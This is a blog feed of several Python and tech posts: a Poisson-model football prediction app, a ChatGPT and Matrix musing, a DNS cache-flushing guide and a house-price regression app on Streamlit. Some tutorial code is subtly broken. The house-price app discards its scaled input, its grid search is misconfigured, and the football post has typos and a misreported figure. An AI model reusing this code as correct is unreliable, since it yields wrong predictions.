Posted on Leave a comment

How I Created a Football Prediction App on Streamlit

5/5 – (2 votes)

This tutorial shows you how I created a model to predict football results using Poisson distribution. You’ll learn how I designed an interactive dashboard on Streamlit where our users can select a team and get to know the odds of a home win, draw, or away win.

Here’s a live demo of using the app to predict different games, such as Arsenal vs. Southampton:

The purpose of this tutorial is purely educational, to introduce you to some concepts in Python. Using this app other than what it is stated for, for example, to compare bookmakers’ odds, and place a stake, is entirely at your own risk.

We will be predicting the English Premier League as it’s the most-watched sport in the world.

Poisson Distribution

Speaking in a football context, how likely will a match result in a win or draw within 90 minutes of gameplay? If it’s to result in a win, what are the chances of a team scoring 3 goals with a clean sheet?

That is exactly what a Poisson distribution tends to answer.

ℹ Info: A Poisson distribution is a type of probability distribution that helps to calculate the chance of a certain number of events happening in a given space or time period. It considers the average rate of these events and assumes they are independent of each other.

So, here are our assumptions:

  1. Two or more events occurring are independent of each other. This means that if Tottenham FC were to pack the box, it does not prevent Manchester City from scoring against them in a match.
  2. Two events cannot occur simultaneously at the same time. This means that if Chelsea were to score a goal, it would not result in an instant equalizer.
  3. The number of events occurring in a given time interval can be counted. This means we can precisely say that Liverpool will commit a painful mistake that will gift their rival the trophy.

As we can see from the above examples, the assumptions are not always the case in real-life situations, thus rendering the Poisson distribution as pointless as it appears to offer anything useful. Despite the inherent limitations, we can still draw insight from this model to see if its features can form a basis for further research for any predictive football model.

Sparing you with the theories and mathematical formula, we get down to business to see how we can implement the Poisson distribution using Python.

The Dataset

We will import match results from the English Premier League (EPL). There are various sources to get this data, Kaggle1, GitHub2, and football API3. But we will source our data from football-data.co.uk4.

⚽ At the point of writing, the EPL has gone halfway. It is now becoming more interesting than when it commenced. Arsenal’s dramatic resurgence means they are seen by many as favorites to win the crown. Manchester City are relentlessly in hot pursuit, especially with the arrival of Erling Haaland. Newcastle have become a surprising contender for the title.

On the other hand, Chelsea is nowhere to be found in the Champions League places, and so is Liverpool. These indicate that football is unpredictable. Hence, using the past to predict the future may not yield the expected results.

Furthermore, some Premier League clubs have undergone dramatic changes. From the change of ownership to managerial change to the transfer of players in and out of the competition. All these have made football prediction a very difficult one.

For these and other reasons, I used only the data from the current season to train the model.

import pandas as pd
data = pd.read_csv('https://www.football-data.co.uk/mmz4281/2223/E0.csv')
print(data.shape)
# (199, 106)

We will not save the data. It is going to be in such a way that we will be getting real-time updates to make the prediction. The data has 106 columns, but we are only interested in 4 columns.

Let’s select and rename them.

epl = data[['HomeTeam', 'AwayTeam','FTHG', 'FTAG']]
epl = epl.rename(columns={'FTHG': 'HomeGoals', 'FTAG':'AwayGoals'})
print(epl.head())

Output:

 HomeTeam AwayTeam HomeGoals AwayGoals
0 Crystal Palace Arsenal 0 2
1 Fulham Liverpool 2 2
2 Bournemouth Aston Villa 2 0
3 Leeds Wolves 2 1
4 Newcastle Nott'm Forest 2 0

We want to compare our predictions with live results. So, we will reserve the last 20 rows representing two game weeks. Then we see if we can draw insights from the home and away goals.

test = epl[-20:]
epl = epl[:-20]
print(epl[['HomeGoals', 'AwayGoals']].mean())

Output:

HomeGoals 1.631285
AwayGoals 1.217877
dtype: float64

We now have 179 rows and 4 columns. You can see that, on average, the home team scores more goals than the away team but only by a small margin.

This information is vital. If an event follows a Poisson distribution, the mean also known as lambda; is the only thing we need to know to find the probability of that event occurring a certain number of times.

A skellam distribution is the difference between two means of a Poisson distribution (the mean of the home and away goals in our case).

We can then calculate the probability mass function (PMF) for a skellam distribution using the mean goals to determine the probability of a draw or a win between home and away teams.

from scipy.stats import skellam, poisson

from scipy.stats import skellam, poisson # probability of a draw
skellam.pmf(0.0, epl.HomeGoals.mean(), epl.AwayGoals.mean())
# Output: 0.24434197359198495 # probability of a win by one goal
skellam.pmf(1.0, epl.HomeGoals.mean(), epl.AwayGoals.mean())
# Output: 0.22500333061251618

The result shows that the probability of a draw in EPL is 24% while a win by one goal is 25%. Remember, this is a combination of all the matches. We will then follow this process to model specific matches.

Data Preparation

Before we begin building the model, let’s first prepare our data, making it suitable for modeling.

home = epl.iloc[:,0:3].assign(home=1).rename(columns={'HomeTeam':'team', 'AwayTeam':'opponent', 'HomeGoals':'goals'})
away = epl.iloc[:, [1, 0, 3]].assign(home=0).rename(columns={'AwayTeam': 'team', 'HomeTeam': 'opponent', 'AwayGoals': 'goals'})
df = pd.concat([home, away])
print(df)

Output:

 team opponent goals home
0 Crystal Palace Arsenal 0 1
1 Fulham Liverpool 2 1
2 Bournemouth Aston Villa 2 1
3 Leeds Wolves 2 1
4 Newcastle Nott'm Forest 2 1
.. ... ... ... ...
174 Tottenham Crystal Palace 4 0
175 Man City Chelsea 1 0
176 Chelsea Fulham 1 0
177 Leeds Aston Villa 1 0
178 Man City Man United 1 0 [358 rows x 4 columns]

We wanted to merge everything that represents home and away into a single column.

So, what we did was to filter them out, gave them similar names, then, concatenate them.

To differentiate away goals from home goals, we created a column and assigned 1 to represent home goals and 0 for away goals. Our data is now suitable for modeling.

The Generalized Linear Model

The generalized linear model is a family of models in which logistic regression and linear regression models we use in machine learning are included. It is used to model different types of data. Poisson regression as part of the generalized linear model is used to analyze count data.

Remember, we are dealing with count data. For example, the number of goals per match. Since count data follows a Poisson distribution, we will be using Poisson regression to build our model.

import statsmodels.api as sm
import statsmodels.formula.api as smf formula = 'goals ~ team + opponent + home'
model = smf.glm(formula=formula, data=df, family=sm.families.Poisson()).fit()
print(model.summary())

We imported statsmodels library to help us build the model.

The formula to predict the number of goals is defined as the combination of the team, opponent, and whether it is home or away goals. Take a look at the summary. The result of the Generalized Linear Model contains so much that we cannot explain all of them in this article.

But let’s focus on the coef column.

As you already know, the team side means a home match, and the opponent side means an away match. If the value is closer to 0, it indicates the possibility of a draw. If the value of the home side is positive, it means the team has a strong attacking ability. Teams with a negative value indicate that they have a not-so-strong attacking ability.

Having trained the model, we can now use it to make predictions. Let’s create a function to do so.

def predict_match(model, homeTeam, awayTeam, max_goals=10): home_goals = model.predict(pd.DataFrame(data={'team': homeTeam, 'opponent':awayTeam, 'home': 1}, index=[1])).values[0] away_goals = model.predict(pd.DataFrame(data={'team': awayTeam, 'opponent': homeTeam, 'home':0}, index=[1])).values[0] pred = [[poisson.pmf(i, team_avg) for i in range(0, max_goals+1)] for team_avg in [home_goals, away_goals]] return(np.outer(np.array(pred[0]), np.array(pred[1])))

The function has four parameters:

  • the Poisson model to be used to make the predictions,
  • the home team,
  • the away team, and
  • the maximum number of goals.

We set it to 10 as the highest a team can score within 90 minutes of gameplay. Remember, the formula combines all these to predict the number of goals.

We looped over the predicted number of home and away goals. We also looped over the maximum goals.

In each iteration, we calculate the probability mass function of the Poisson distribution. This tells us the probability of a team scoring several goals. Taking the outer product of the two sets of probabilities, the function created and returned a matrix.

Let me assume Arsenal and Manchester City are to face each other at Emirate Stadium and you want to make the prediction.

print(model.predict(pd.DataFrame(data={'team': 'Arsenal', 'opponent': 'Man City', 'home':1}, index=[1])))

Output:

1. 2.026391
dtype: float64

The model is predicting Arsenal to score two goals…

print(model.predict(pd.DataFrame(data={'team': 'Man City', 'opponent': 'Arsenal', 'home':0}, index=[1])))

Output:

1 1.284658
dtype: float64

… and Manchester City to score 1.23 goals, approximately 3 goals in the match.

The model roughly predicts a 2-1 home win for Arsenal.

Now that the three members of the formula are complete, we can feed it to the predict_match() function to get the odds of a home win, away win, and a draw.

ars_man = predict_match(model, 'Arsenal', 'Man City', max_goals=3)

Result:

array([[0.03647786, 0.04686159, 0.03010057, 0.01288965], [0.07391843, 0.09495992, 0.06099553, 0.02611947], [0.07489383, 0.09621298, 0.06180041, 0.02646414], [0.05058807, 0.06498838, 0.04174394, 0.01787557]])

The rows and columns represent Arsenal and Manchester City’s chances of scoring a particular goal respectively.

The diagonal entries represent a draw since it is where both teams score the same number of goals. Below the line (the lower triangle of the array found using numpy.tril) is Arsenal’s victory, and above (the upper triangle of the array found using numpy.triu) is Man City’s.

Let’s automate this with Python.

import numpy as np # victory for Arsenal
np.sum(np.tril(ars¬_man, -1)) * 100
# 40.23456259724963 # victory for Man City
np.sum(np.triu(ars_man, 1)) * 100
# 20.34309498981432 # a draw
np.sum(np.diag(ars_man)) * 100
# 21.111376045176485

Our model tells us that Arsenal has a 40% chance of winning which is much more than Man City’s odds at 21%. That makes the earlier prediction of 2-1 correspond accordingly.

Feel free to compare your prediction with the test data and see how far or close you are to predict live results. We can now proceed to create a football prediction app on Streamlit.

Check my GitHub page to see the full script.

Check out the live demo app to play with it!

Streamlit Dashboard

In the file named app.py, you will see how I used st.sidebar.selectbox to display a list of all the clubs in the Premier League. This will appear on the left-hand side. Since the names of the club appeared twice, I made sure that only one was selected for prediction.

The rest of the code has been explained. If the button is pressed, the get_scores() function is executed and displays the prediction results.

👉 Recommended: Streamlit Button — Ultimate Guide with Video

Notice that I didn’t save the dataset.

Whenever the app is opened, it will get real-time updates that will help it train the model for the next prediction. Also, since every code is not wrapped in a function, the order is important.

That is why the get_scores() function was called last. Of course, there are many ways to write the code and get the same result.

A Word of Caution

I clarified to you from the beginning that this article is for educational purposes only and should not be used for anything else.

Many things can impact the result of a match that the model didn’t put into consideration. Change of a manager, injury, refereeing decision, player fitness, team morale, weather condition, plus the limitations of Poisson distribution used to make these predictions.

Of course, no model is perfect. So, use responsibly.

Prediction Result

I deployed the app on Streamlit Cloud and tried to predict upcoming matches in the English Premier League.

The results were amazing. You can give it a try. I don’t expect the Premier League clubs to get those scores. Predicted result is not always the same as actual result. But I will rate the performance of our model if some, if not all, the home wins, draws, or away wins were predicted correctly.

Conclusion

We have learned a lot today, ranging from data manipulation to model building.

You learned how to make football predictions using Poisson distribution. I did my best to make the explanation simple by leaving the mathematical theories and calculations behind. If you want to know more, you have the internet at your disposal. Alright, have a nice day.

👉 Recommended: How I Built a House Price Prediction App Using Streamlit

Resources

  1. https://www.kaggle.com/hugomathien/soccer
  2. https://github.com/jalapic/engsoccerdata
  3. http://api.football-data.org/index
  4. http://www.football-data.co.uk/englandm.php
  5. https://jonaben1-football-prediction-app-nlr1w7.streamlit.app
Posted on Leave a comment

What ChatGPT Thinks About The Matrix – Do This to Break Free!

5/5 – (1 vote)

With delight, my wife and I realized that our daughter was now old enough to watch the Matrix Trilogy.

If you don’t know the story, here’s a short recap:

😎 Story Recap: The Matrix Trilogy tells the story of Neo, a computer hacker who discovers that the world he knows is actually an elaborate virtual reality created by sentient machines. He joins a group of rebels led by Morpheus and Trinity, who have discovered the truth about the Matrix and are fighting to free humanity from its control. In order to save humanity, Neo must battle the machines and their agents, including the ruthless Agent Smith. Ultimately, Neo must make the ultimate sacrifice to save humanity from the machines.

Yesterday night we finished the third movie, and as these things go, we discussed the deeper meaning of the movie and how it applies to our real world.

What Is Real?

Prof. Yuval Harari frequently points out that the “real world” is a web of fictional stories. Such as:

  • Money,
  • Nations,
  • Monday-Friday,
  • Marriages,
  • Social classes,
  • Laws,
  • Corporations, and
  • Ideological power hierarchies.

Yuval Harari believes that stories are a powerful tool for humans to make sense of their lives and the world around them.

He argues that stories provide a sense of identity, purpose, and belonging and that they can be used to shape our values and beliefs. Harari believes that stories have been essential for humanity’s success, and that they have been used to provide a narrative for our actions and a framework for our decisions.

He stresses the importance of questioning the stories we tell ourselves, and of being aware of the stories that are told to us by others.

🆗 Reality Test: Harari provides a solid test to check if something is fiction or reality. Ask: can it suffer? The answer reveals whether “it” is real or a story. For example, money cannot suffer, so it must be a story or ideology. However, a human being or an animal can suffer so they must be real, according to the suffering test.

My daughter loves this stuff.

A Story of Individualism – What ChatGPT Thinks About The Matrix

Weaponized with the most powerful invention of humankind (ChatGPT), we tried to confirm the meaning of the Matrix idea – what is the truth beyond the matrix?

Here’s ChatGPT’s deep answer (IQ 500):

🤖 ChatGPT: “The truth beyond the Matrix is the power of the individual. It’s the power to choose our own paths, to pursue our own dreams, and live life on our own terms. It’s the power to be true to ourselves, to be in control of our own destiny, and to be free from the confines of the system. It’s the freedom to be who we truly are, without fear or judgement, and to live life with purpose and joy.”

Evil robot Mr. Smith tries to copy&paste its own infectious DNA to homogenize all citizens of the Matrix. His counterpart Neo wants to give freedom and individualism to all people, so they can embrace their individual strengths and weaknesses.

Embrace Your Strengths to Set You Free

I think this is a lesson worth holding on to – embrace your strengths and quirks because they make you human. Profoundly, only your strengths can accelerate your career and bring you success.

Famous management consultant Peter Drucker says it best: You can only perform from your strengths.

👉 Recommended: 26 Tips to Triple or Quadruple Your Income as a Freelance Developer

Today you can decide to focus on your few strengths and passions and push them to higher highs – or you can decide to focus on improving your thousands of weaknesses.

You are given limited time and energy, so you can’t do both. Red pill, blue pill.

The most successful individuals are those who have embraced their strengths and used them to their advantage for many reasons. Here are three good ones:

Firstly, focusing on your strengths rather than weaknesses allows you to pursue your passions and interests. It is important to recognize your strengths and work to develop them because they are what set you apart from others and make you unique. By embracing your strengths and working on them, you can create a career path that suits you and your interests. This will help you to stay motivated and inspired, ultimately leading to more success and satisfaction in your life.

Secondly, focusing on your strengths rather than weaknesses allows you to be more productive. When you focus on your weaknesses, you waste time and energy trying to improve them. Instead, you should focus on what you are already good at, as this will help you to be more efficient and effective. This will help you to reach your goals faster and more successfully.

Lastly, embracing your strengths rather than trying to even out all your weaknesses can help you to build self-confidence. When you focus on your strengths, you become aware of the skills and abilities you possess. This can help you to believe in your own capabilities and trust yourself. This is important, as having self-confidence is essential for achieving success in life.

It is more important to embrace your strengths rather than to even out all your weaknesses. This is because it allows you to pursue your passions, become more productive, and build self-confidence.

👉 Decide whether you want to be average, if you’re lucky, at many things or excellent at a few.

To your freedom! 🚀

Chris


This story was originally published in one of my programming newsletters to my students. It’s free; you can join here or here:

Posted on Leave a comment

How to Flush Your Cache on Windows and Router

5/5 – (1 vote)

I work a lot with DNS settings for my websites and apps.

Today I added a few new DNS entries to set up a new server. I used DNS propagation checkers and confirmed that the DNS entries were already updated internationally. But unfortunately, I myself couldn’t access the website on my Windows machine behind my Wifi router. I could, however, access the website with my smartphone after switching off Wifi there.

This left only one conclusion: My browser, Windows OS, or router cached the stale DNS entries.

So the natural question arises:

💬 Question: How to flush your browser cache, Windows cache, and router cache and reset the DNS entries so they’ll be loaded freshly from the name servers?

I’ll answer these three subproblems one by one in this short tutorial:

  • Step 1: Flush your browser DNS cache (Chrome, Edge, Firefox)
  • Step 2: Flush your Windows DNS cache
  • Step 3: Flush your router DNS cache

Let’s dive into each of them one by one!

Step 1: Reset Your Browser Cache

First, reset your browser cache because it may store some DNS entries. I’ll show you how to flush your browser cache for the three most popular browsers on Windows:

  • Chrome
  • Edge
  • Firefox

Here’s how! 👇

Clear Cache In Chrome

  1. Open Chrome
  2. At the top right, click More with the three vertical dots
  3. Click More tools > Clear browsing data
  4. Choose a time range. To flush everything, select All time
  5. Check boxes next to Cookies and other site data and Cached images and files
  6. Click Clear data

👉 More here

Clear Cache In Microsoft Edge

Go to Settings > Privacy, search, and services > scroll down > click Choose what to clear > Change the Time range and check boxes next to Cookies and other site data and Cached images and files. Then click Clear now.

👉 More here

Clear Cache In Firefox

Click the menu button (three horizontal bars) and select Settings > Privacy & Security. Scroll down to Cookies and Site Data section and click Clear Data.... Remove check mark in front of Cookies and Site Data so that only Cached Web Content is checked. Click the Clear button.

👉 More here

Now your browser has no stale DNS entries — but in my case, this didn’t fix the problem. After all, your operating system may have cached it first!

Step 2: Reset Your Windows OS Cache

There’s a long and a short answer to the question on how to flush the Windows operating system cache. In my case, it worked with the shorter answer but you may want to use the long answer instead if you absolutely need to make sure your Windows DNS cache is empty.

How to Flush Your Windows Cache (Short Answer)

Type cmd into the Windows search field and press Enter. Type “ipconfig /flushdns” and press Enter.

How to Flush Your Windows Cache (Long Answer)

  • Type cmd into the Windows search field and press Enter.
  • Type “ipconfig /flushdns” and press Enter.
  • Type “ipconfig /registerdns” and press Enter.
  • Type “ipconfig /release” and press Enter.
  • Type “ipconfig /renew” and press Enter.
  • Type “netsh winsock reset” and press Enter.
  • Restart the computer.

    Step 3: Reset Your Router Cache

    This one is simple (although a bit time-consuming): To reset your router DNS cache for sure, unplug your router and leave it unplugged for 30 seconds or more. This will reset its DNS cache for sure. Done!

    Posted on Leave a comment

    How I Built a House Price Prediction App Using Streamlit

    5/5 – (1 vote)

    In this tutorial, I will take you through a machine learning project on House Price prediction with Python. We have previously learned how to solve a classification problem.

    👉 Recommended: How I Built and Deployed a Python Loan Eligibility Prediction App on Streamlit

    Today, I will show you how to solve a regression problem and deploy it on Streamlit Cloud.

    You can find an app prototype to try out here:

    What Is Streamlit?

    💡 Info: Streamlit is a popular choice for data scientists looking to deploy their apps quickly because it is easy to set up and is compatible with data science libraries. We are going to set up the dashboard so that when our users fill in some details, it will predict the price of a house.

    But you may wonder:

    Why Is House Price Prediction Important?

    Well, house prices are an important reflection of the economy. The price of a property is important in real estate transactions as it provides information to stakeholders, including real estate agents, investors, and developers, to enable them to make informed decisions.

    Governments also use such information to formulate appropriate regulatory policies. Overall, it helps all parties involved to determine the selling price of a house. With such information, they will then decide when to buy or sell a house.

    We will use machine learning with Python to try to predict the price of a house. Having a background knowledge of Python and its usage in machine learning is a necessary prerequisite for this tutorial.

    👉 Recommended: Python Crash Course (Blog + Cheat Sheets)

    To keep things simple, we will not be dealing with data visualization.

    The Datasets

    We will be using California Housing Data of 1990 to make this prediction. You can get the dataset on Kaggle or you check my GitHub page. Let’s load it using the Pandas library and find the number of rows and columns.

    import pandas as pd data = pd.read_csv('housing.csv')
    print(data.shape)
    # (20640, 10)

    We can see the dataset has 20640 rows and 10 features.

    Let’s get more information about the columns using the .info() method.

    data.info()

    Output:

    <class 'pandas.core.frame.DataFrame'>
    RangeIndex: 20640 entries, 0 to 20639
    Data columns (total 10 columns): # Column Non-Null Count Dtype
    --- ------ -------------- ----- 0 longitude 20640 non-null float64 1 latitude 20640 non-null float64 2 housing_median_age 20640 non-null float64 3 total_rooms 20640 non-null float64 4 total_bedrooms 20433 non-null float64 5 population 20640 non-null float64 6 households 20640 non-null float64 7 median_income 20640 non-null float64 8 median_house_value 20640 non-null float64 9 ocean_proximity 20640 non-null object
    dtypes: float64(9), object(1)
    memory usage: 1.6+ MB
    
    1. The longitude indicates how far west a house is while the latitude shows how far north the house is.
    2. The housing_median_age indicates the median age of a building. A lower number tells us that the house is newly constructed.
    3. The total_rooms and total_bedrooms indicate the total number of rooms and bedrooms within a block.
    4. The population tells us the number of people within a block while the households tell us the number of people living within a home unit of a block.
    5. The median_income is measured in tens of thousands of US Dollars. It shows the median income of households living within a block.
    6. The median_house_value is also measured in US Dollars. It is the median house value for households living in one block.
    7. The ocean_proximity tells us how close to the sea a house is located.

    The dataset has the same number of columns except total_bedroom indicating the presence of missing values. They are all of float datatype except ocean_proximity which is categorical even though it is shown as object. Let us first confirm this.

    data.ocean_proximity.value_counts()

    Output:

    <1H OCEAN 9136
    INLAND 6551
    NEAR OCEAN 2658
    NEAR BAY 2290
    ISLAND 5
    Name: ocean_proximity, dtype: int64

    It is categorical. So, we have to convert the ocean_proximity to int datatype using labelEncoder from the Scikit-learn library.

    from sklearn.preprocessing import LabelEncoder label_encoder = LabelEncoder()
    obj = (data.dtypes == 'object') for col in list(obj[obj].index): data[col] = label_encoder.fit_transform(data[col])
    

    Let’s check to confirm.

    data.ocean_proximity.value_counts()

    Output:

    0 9136
    1 6551
    4 2658
    3 2290
    2 5
    Name: ocean_proximity, dtype: int64

    Take note of the way labelEncoder ordered the values. We will apply this when creating our Streamlit dashboard. We then fill in the missing values with the mean of their respective columns.

    for col in data.columns: data[col] = data[col].fillna(data[col].mean()) print(data.isna().sum())

    Output:

    longitude 0
    latitude 0
    housing_median_age 0
    total_rooms 0
    total_bedrooms 0
    population 0
    households 0
    median_income 0
    median_house_value 0
    ocean_proximity 0
    dtype: int64

    Having confirmed that there are no missing values, we can now proceed to the next step.

    Standardizing the Data

    If you take a glimpse of our data using the .head() method, you will observe that the data is of differing scales.

    This will affect the model’s ability to perform accurate predictions.

    Hence, we will have to standardize our data using StandardScaler from Scikit-learn. Also, to prevent data leakage, we will make use of pipelines.

    The Models

    We have no idea which algorithm or model will perform well in this regression problem.

    A test will be carried out on different algorithms using default tuning parameters. Since this is a regression problem, we will be using 10-fold cross-validation to design our test harness and evaluate the models using R Squared metric.

    💡 Info: The R Squared metric is an indication of goodness of fit. It is between 0 and 1. The closer to 1 the better. When the value is 1, it means a perfect fit.

    K-fold cross-validation works by splitting the datasets into several parts (10 folds in our case).

    The algorithm is trained repeatedly on each fold with one held back for testing. We chose this approach over train_test_split method because it gives us a more accurate and reliable result as the model is trained and evaluated repeatedly on different data.

    from sklearn.svm import SVR
    from sklearn.neighbors import KNeighborsRegressor
    from sklearn.tree import DecisionTreeRegressor
    from sklearn.linear_model import LinearRegression, Lasso, ElasticNet
    from sklearn.model_selection import KFold, cross_val_score, train_test_split
    from sklearn.pipeline import Pipeline
    import bz2 pipelines = []
    pipelines.append(('ScaledLR', Pipeline([('Scaler', StandardScaler()), ('LR', LinearRegression())])))
    pipelines.append(('ScaledLASSO', Pipeline([('Scaler', StandardScaler()), ('LASSO', Lasso())])))
    pipelines.append(('ScaledEN', Pipeline([('Scaler', StandardScaler()), ('EN', ElasticNet())])))
    pipelines.append(('ScaledKNN', Pipeline([('Scaler', StandardScaler()), ('KNN', KNeighborsRegressor())])))
    pipelines.append(('ScaledCART', Pipeline([('Scaler', StandardScaler()), ('CART', DecisionTreeRegressor())])))
    pipelines.append(('ScaledSVR', Pipeline([('Scaler', StandardScaler()), ('SVR', SVR())]))) x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.3, random_state=7) def modeling(models): for name, model in models: kfold = KFold(n_splits=10) results = cross_val_score(model, x_train, y_train, cv = kfold, scoring='r2') print(f'{name} = {results.mean()}')
    

    Notice how we used Pipeline while standardizing our models. We then created a function that used 10-fold cross validation to repeatedly train our models. Then, the result is displayed using R Squared metric.

    modeling(pipelines)
    ScaledLR = 0.6321641933826154
    ScaledLASSO = 0.6321647820595134
    ScaledEN = 0.4953062096224026
    ScaledKNN = 0.7106787517028879
    ScaledCART = 0.6207570733565403
    ScaledSVR = -0.05047991785208246
    

    The results show that KNN benefited from scaling the data. Let’s see if we can improve the result by tuning KNN parameters.

    Tuning the Parameters

    The default number of neighbors of KNN is 7, and with it KNN achieved good results. We will conduct a grid search to identify which parameters will yield an even greater score.

    scaler = StandardScaler().fit(x_train)
    rescaledx = scaler.transform(x_train)
    k = list(range(1, 31))
    kfold = KFold(n_splits=10)
    grid = GridSearchCV(model, param_grid=param_grid, cv = k, scoring='r2')
    grid_result = grid.fit(rescaledx, y_train) print(f'Best: {grid_result.best_score_} using {grid_result.best_params_}')
    # Best: 0.7242988300529242 using {'n_neighbors': 14}

    The best for k is 14 with a mean score of 0.7243, slightly improved compared to the previous score.

    Can we better this score? Yes, of course. I’m aiming for 80% and above accuracy. In that case, we will try using ensemble methods.

    Ensemble Methods

    Let’s see what we can achieve using 4 different ensemble machine learning algorithms. Everything other than the models remains the same.

    from sklearn.ensemble import RandomForestRegressor, ExtraTreesRegressor, GradientBoostingRegressor, AdaBoostRegressor # ensembles
    ensembles = []
    ensembles.append(('ScaledAB', Pipeline([('Scaler', StandardScaler()), ('AB', AdaBoostRegressor())])))
    ensembles.append(('ScaledGBM', Pipeline([('Scaler', StandardScaler()), ('GBM', GradientBoostingRegressor())])))
    ensembles.append(('ScaledRF', Pipeline([('Scaler', StandardScaler()), ('RF', RandomForestRegressor())])))
    ensembles.append(('ScaledET', Pipeline([('Scaler', StandardScaler()), ('ET', ExtraTreesRegressor())]))) for name, model in ensembles: cv_results = cross_val_score(model, x_train, y_train, cv=kfold, scoring='r2') print(f'{name} = {cv_results.mean()}')
    

    Output:

    ScaledAB = 0.3835320642243155
    ScaledGBM = 0.772428054038791
    ScaledRF = 0.81023174859107
    ScaledET = 0.7978581384771901

    Random Forest Regressor achieved the highest score, and it’s what we are aiming for. Therefore, we are selecting the Random Forest Regressor algorithm to train and predict the price of a building. But can it do better than this? Sure, given that we trained only on default tuning parameters.

    Here is the full code. Save it as model.py.

    import pandas as pd
    from sklearn.preprocessing import LabelEncoder, StandardScaler
    from sklearn.ensemble import RandomForestRegressor
    from sklearn.model_selection import train_test_split, KFold, cross_val_score
    import pickle data = pd.read_csv('housing.csv')
    # select only 1000 rows
    data = data[:1000]
    # converting categorical column to int datatype
    label_encoder = LabelEncoder()
    obj = (data.dtypes == 'object')
    for col in list(obj[obj].index): data[col] = label_encoder.fit_transform(data[col]) # filling in missing values
    for col in data.columns: data[col] = data[col].fillna(data[col].mean()) # making data a numpy array like
    x = data.drop(['median_house_value'], axis=1)
    y = data.median_house_value
    x = x.values
    y = y.values
    # dividing data into train and test
    x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.3, random_state=7) # standardzing the data
    stds = StandardScaler()
    scaler = stds.fit(x_train)
    rescaledx = scaler.transform(x_train) # selecting and fitting the model for training
    model = RandomForestRegressor()
    model.fit(rescaledx, y_train)
    # saving the trained mode
    pickle.dump(model, open('rf_model.pkl', 'wb'))
    # saving StandardScaler
    pickle.dump(stds, open('scaler.pkl', 'wb'))
    

    We selected only 1000 rows to reduce pickled size.

    Notice that we saved the StandardScaler() function to be used while creating the Streamlit dashboard. Since we scaled the dataset, we also expect to scale the input details from our users.

    Streamlit Dashboard

    It’s now time to design our Streamlit app. Once again, we will try to keep things simple and avoid complex designs. Save the following code as app.py.

    import streamlit as st
    import pickle def main(): style = """<div style='background-color:pink; padding:12px'> <h1 style='color:black'>House Price Prediction App</h1> </div>""" st.markdown(style, unsafe_allow_html=True) left, right = st.columns((2,2)) longitude = left.number_input('Enter the Longitude in negative number', step =1.0, format="%.2f", value=-21.34) latitude = right.number_input('Enter the Latitude in positive number', step=1.0, format='%.2f', value= 35.84) housing_median_age = left.number_input('Enter the median age of the building', step=1.0, format='%.1f', value=25.0) total_rooms = right.number_input('How many rooms are there in the house?', step=1.0, format='%.1f', value=56.0) total_bedrooms = left.number_input('How many bedrooms are there in the house?', step=1.0, format='%.1f', value=15.0) population = right.number_input('Population of people within a block', step=1.0, format='%.1f', value=250.0) households = left.number_input('Poplulation of a household', step=1.0, format='%.1f',value=43.0) median_income = right.number_input('Median_income of a household in Dollars', step=1.0, format='%.1f', value=3000.0) ocean_proximity = st.selectbox('How close to the sea is the house?', ('<1H OCEAN', 'INLAND', 'NEAR OCEAN', 'NEAR BAY', 'ISLAND')) button = st.button('Predict') # if button is pressed if button: # make prediction result = predict(longitude, latitude, housing_median_age, total_rooms,total_bedrooms, population, households, median_income, ocean_proximity) st.success(f'The value of the house is ${result}')
    

    We imported Streamlit and other libraries. Then we defined our main function. We want it to be executed as soon as we open the app. So, we will call the function using the __name__ variable at the very last of our script.

    The unsafe_allow_html makes it possible for the HTML tags to be executed by Python.

    With st.columns, we were able to display our variables side by side. We formatted each variable to be the same datatype in our dataset. If the button is pressed, then a callback function, the predict() function, is executed.

    👉 Recommended: Streamlit Button — A Helpful Guide

    Let’s now define the predict() function.

    # load the train model
    with open('rf_model.pkl', 'rb') as rf: model = pickle.load(rf) # load the StandardScaler
    with open('scaler.pkl', 'rb') as stds: scaler = pickle.load(stds) def predict(longitude, latitude, housing_median_age, total_rooms, total_bedrooms, population, households, median_income, ocean_pro): # processing user input ocean = 0 if ocean_pro == '<1H OCEAN' else 1 if ocean_pro == 'INLAND' else 2 if ocean_pro == 'ISLAND' else 3 if ocean_pro == 'NEAR BAY' else 4 med_income = median_income / 5 lists = [longitude, latitude, housing_median_age, total_rooms, total_bedrooms, population, households, med_income, ocean] df = pd.DataFrame(lists).transpose() # scaling the data scaler.transform(df) # making predictions using the train model prediction = model.predict(df) result = int(prediction) return result
    

    We started by loading the train model and StandardScaler we saved earlier.

    In the predict() function, we use a ternary operator to turn user input into a number. More info about this operator in the referenced blog tutorial or this video:

    YouTube Video

    Notice that we made sure it corresponds with the number assigned by LabelEncoder. If you are ever in doubt, use the .value_counts() method on the categorical column to confirm.

    We divided the median_income by 5 since the corresponding column in our dataset is said to be in tens of thousands of Dollars. However, this may not be necessary given that StandardScaler finally scaled the data. We did it just to be on the safe side.

    The double parentheses are our way of instructing Python to turn the given inputs into a DataFrame. We also made sure the order of the parameters in the predict() function corresponds accordingly.

    If the function seems to predict the same amount despite changes to the input details, then you may check the correlation the target variable has over the features by typing data.corr().

    If we were to apply Recursive Feature Elimination (RFE) to select the best features capable of predicting the target variable, it would select just 4: longitude, latitude, median_income, and ocean_proximity. Let me show you what I mean.

    from sklearn.feature_selection import RFE
    model = RandomForestRegressor() rfe = RFE(model)
    fit = rfe.fit(x,y) print(fit.n_features_)
    # 4 print(fit.support_)
    # array([ True, True, False, False, False, False, False, True, True]) print(fit.ranking_)
    # array([1, 1, 2, 6, 3, 5, 4, 1, 1])
    

    Only 4 features are capable of predicting the target variable. If you kept getting the same amount, that may be the reason.

    The purpose of this tutorial is purely educational, to demonstrate how to use Python to solve machine learning problems. I tried to keep things simple by not going through data visualization and feature engineering. Since the data is old, it should not be relied on when making important decisions.

    We finally came to the end of the tutorial. Be sure to check my GitHub page to see the full project code.

    To deploy on Streamlit Cloud, I assume you have already created a repository and added the required files. Then, you create an account on Streamlit Cloud, and input your repository URL. Streamlit will do the rest.

    I have already deployed mine on Streamlit Cloud. Alright, enjoy your day.

    👉 Recommended Project: How I Built and Deployed a Python Loan Eligibility Prediction App on Streamlit

    Posted on Leave a comment

    How to Install phpMyAdmin on a Windows?

    by Vincy. Last modified on February 2nd, 2023.

    Installing phpMyAdmin on a Windows computer will vary based on the existing environment. This article will tell the step-by-step process of installing phpMyAdmin using the following methods.

    1. Manual installation on top of the existing Apache server.
    2. Installation via WAMP package.

